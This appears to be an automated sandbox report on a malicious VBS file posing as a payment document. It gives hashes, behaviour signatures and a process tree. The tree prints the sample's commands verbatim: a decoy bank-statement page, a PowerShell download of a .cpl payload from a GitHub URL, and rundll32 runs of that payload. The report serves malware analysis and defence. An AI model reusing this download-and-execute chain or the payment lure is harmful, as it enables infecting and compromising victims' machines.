Analysis
-
max time kernel
65s -
max time network
19s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
30/03/2025, 18:32
Static task
static1
Behavioral task
behavioral1
Sample
Payment_Activity_0037_2025-3-30.vbs
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
Payment_Activity_0037_2025-3-30.vbs
Resource
win10v2004-20250313-en
General
-
Target
Payment_Activity_0037_2025-3-30.vbs
-
Size
13KB
-
MD5
257ea8ae99c0f328251eecebbb3c4301
-
SHA1
0f6c115c4169c73269ee17955cd6858f71bd9b45
-
SHA256
0d69c127cf01104b06b3407364bbd1c04ae5b6a831317b58d835c50ff9a0468c
-
SHA512
631c1e004e71412b05bf1fb919d26d303a16c3cfbc5bf5e0fdf44533fbd8e47e4cd1ad1e00a39dfd038c51eceaf6bb19404eca49756a657b623b4acccda37b71
-
SSDEEP
192:NB0v8qa258i+nxp2YXBoN8x6kgqDMOhWm3Gmim3jzVcGZlIyB1AQaAMKz3N2v:3qyiAdxoY6HyLjpLZlIyUQanKzN2v
Malware Config
Signatures
-
pid Process 2680 powershell.exe 2820 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 2212 rundll32.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2820 powershell.exe 2680 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2820 powershell.exe Token: SeDebugPrivilege 2680 powershell.exe -
Suspicious use of WriteProcessMemory 32 IoCs
description pid Process procid_target PID 1680 wrote to memory of 2932 1680 WScript.exe 30 PID 1680 wrote to memory of 2932 1680 WScript.exe 30 PID 1680 wrote to memory of 2932 1680 WScript.exe 30 PID 2932 wrote to memory of 2820 2932 cmd.exe 32 PID 2932 wrote to memory of 2820 2932 cmd.exe 32 PID 2932 wrote to memory of 2820 2932 cmd.exe 32 PID 1680 wrote to memory of 2852 1680 WScript.exe 33 PID 1680 wrote to memory of 2852 1680 WScript.exe 33 PID 1680 wrote to memory of 2852 1680 WScript.exe 33 PID 2852 wrote to memory of 2680 2852 cmd.exe 35 PID 2852 wrote to memory of 2680 2852 cmd.exe 35 PID 2852 wrote to memory of 2680 2852 cmd.exe 35 PID 1680 wrote to memory of 2856 1680 WScript.exe 36 PID 1680 wrote to memory of 2856 1680 WScript.exe 36 PID 1680 wrote to memory of 2856 1680 WScript.exe 36 PID 1680 wrote to memory of 612 1680 WScript.exe 38 PID 1680 wrote to memory of 612 1680 WScript.exe 38 PID 1680 wrote to memory of 612 1680 WScript.exe 38 PID 612 wrote to memory of 2200 612 cmd.exe 41 PID 612 wrote to memory of 2200 612 cmd.exe 41 PID 612 wrote to memory of 2200 612 cmd.exe 41 PID 2856 wrote to memory of 2212 2856 cmd.exe 40 PID 2856 wrote to memory of 2212 2856 cmd.exe 40 PID 2856 wrote to memory of 2212 2856 cmd.exe 40 PID 2856 wrote to memory of 2212 2856 cmd.exe 40 PID 2856 wrote to memory of 2212 2856 cmd.exe 40 PID 2856 wrote to memory of 2212 2856 cmd.exe 40 PID 2856 wrote to memory of 2212 2856 cmd.exe 40 PID 2212 wrote to memory of 2208 2212 rundll32.exe 42 PID 2212 wrote to memory of 2208 2212 rundll32.exe 42 PID 2212 wrote to memory of 2208 2212 rundll32.exe 42 PID 2212 wrote to memory of 2208 2212 rundll32.exe 42
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Payment_Activity_0037_2025-3-30.vbs"1⤵
- Suspicious use of WriteProcessMemory
PID:1680 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement2⤵
- Suspicious use of WriteProcessMemory
PID:2932 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell start-process msedge https://www.scribd.com/document/806838445/Bank-Statement3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2820
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl2⤵
- Suspicious use of WriteProcessMemory
PID:2852 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Invoke-WebRequest -Uri https://raw.githubusercontent.com/SC10001/Di/main/DNSBackup.cpl -Outfile C:\ProgramData\DNSBackup\DNSBackup.cpl3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl2⤵
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\SysWOW64\rundll32.exeC:\Windows\SysWOW64\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl3⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious use of WriteProcessMemory
PID:2212 -
C:\Windows\system32\RunDll32.exeC:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl4⤵PID:2208
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c start /b C:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl2⤵
- Suspicious use of WriteProcessMemory
PID:612 -
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe shell32.dll,Control_RunDLL C:\ProgramData\DNSBackup\DNSBackup.cpl3⤵PID:2200
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD55b98dcb704d165e679f8766a583b84b9
SHA1fbf22c3def5d055ab3e1f096eed8878dea8fc033
SHA2563691782c0096eda043e55279d267e1d2a0219c36e5e4effbae9bfe32543956d4
SHA5125ad1a4b8eb7664d4df8c40a3841cd7061bdeb807a5c030afca8046bdb8c69715541dc32c9639e7e820a360ad7a8d1e236c7fd6a949a8c6f71975d12d51770db9